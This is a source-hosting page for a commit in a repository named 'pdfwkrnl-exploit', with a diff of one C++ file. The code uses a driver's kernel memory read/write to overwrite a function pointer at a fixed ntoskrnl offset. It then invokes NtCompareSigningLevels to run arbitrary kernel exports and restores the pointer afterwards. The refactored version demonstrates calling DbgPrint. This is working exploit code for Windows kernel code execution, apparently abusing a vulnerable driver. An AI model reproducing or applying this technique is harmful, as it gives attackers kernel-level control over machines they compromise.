admin/pdfwkrnl-exploit
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

refactor a ton of stuff + dynamic pointer gettin

Browse Source
This commit is contained in:
dpcpointer
2025-05-29 22:22:08 -06:00
committed by GitHub
parent 417931e7e2
commit e1974e0948
6 changed files with 436 additions and 218 deletions
Download Patch File Download Diff File Expand all files Collapse all files

60
source/entry.cpp
View File

@@ -1,54 +1,16 @@
#include "PdFwKrnl.h"
template <typename T, typename... Args>
T call_kernel_function(const char* function_name, Args... args){
uint64_t ntoskrnl_base = pdfwkrnl.get_ntoskrnl_base();
if (!ntoskrnl_base)
return T{};
uint64_t function_address = pdfwkrnl.get_ntoskrnl_export(function_name);
if (!function_address)
return T{};
uint64_t qword_swap = ntoskrnl_base + 0xC1DA00;
uint64_t qword_original = 0;
if (!pdfwkrnl.read_virtual_memory(qword_swap, &qword_original, sizeof(uint64_t)))
return T{};
if (!pdfwkrnl.write_virtual_memory(qword_swap, &function_address, sizeof(uint64_t)))
return T{};
HMODULE m_ntdll = GetModuleHandleA("ntdll.dll");
if (!m_ntdll)
return T{};
FARPROC NtCompareSigningLevels = GetProcAddress(m_ntdll, "NtCompareSigningLevels");
using FuncPtr = T(__stdcall*)(Args...);
if constexpr (std::is_void_v<T>) {
auto func = reinterpret_cast<void(__stdcall*)(Args...)>(NtCompareSigningLevels);
func(args...);
pdfwkrnl.write_virtual_memory(qword_swap, &qword_original, sizeof(uint64_t)); // swap back
return T{};
}
else {
auto func = reinterpret_cast<FuncPtr>(NtCompareSigningLevels);
T return_value = func(args...);
pdfwkrnl.write_virtual_memory(qword_swap, &qword_original, sizeof(uint64_t)); // swap back
return return_value;
}
}
int main() {
if (!pdfwkrnl.attach())
int main(void) {
if (!pdfwkrnl::attach()) {
printf(STR("failed to attach to driver \n"));
return -1;
}
printf("attached to kernel\n");
// a ntstatus of STATUS_INVALID_IMAGE_HASH or 0xC0000428 will always be returned as NtCompareSigningLevels always returns it if returned value by the called function is not equal then 0.
pdfwkrnl::call_kernel_function<void>(pdfwkrnl::get_kernel_export("DbgPrint"), "hello from pdfwkrnl!\n");
call_kernel_function<void>("DbgPrint", "called kernel function");
pdfwkrnl.detach();
return 0;
}
if (!pdfwkrnl::detach()) {
printf(STR("failed to detach from driver \n"));
return -1;
}
}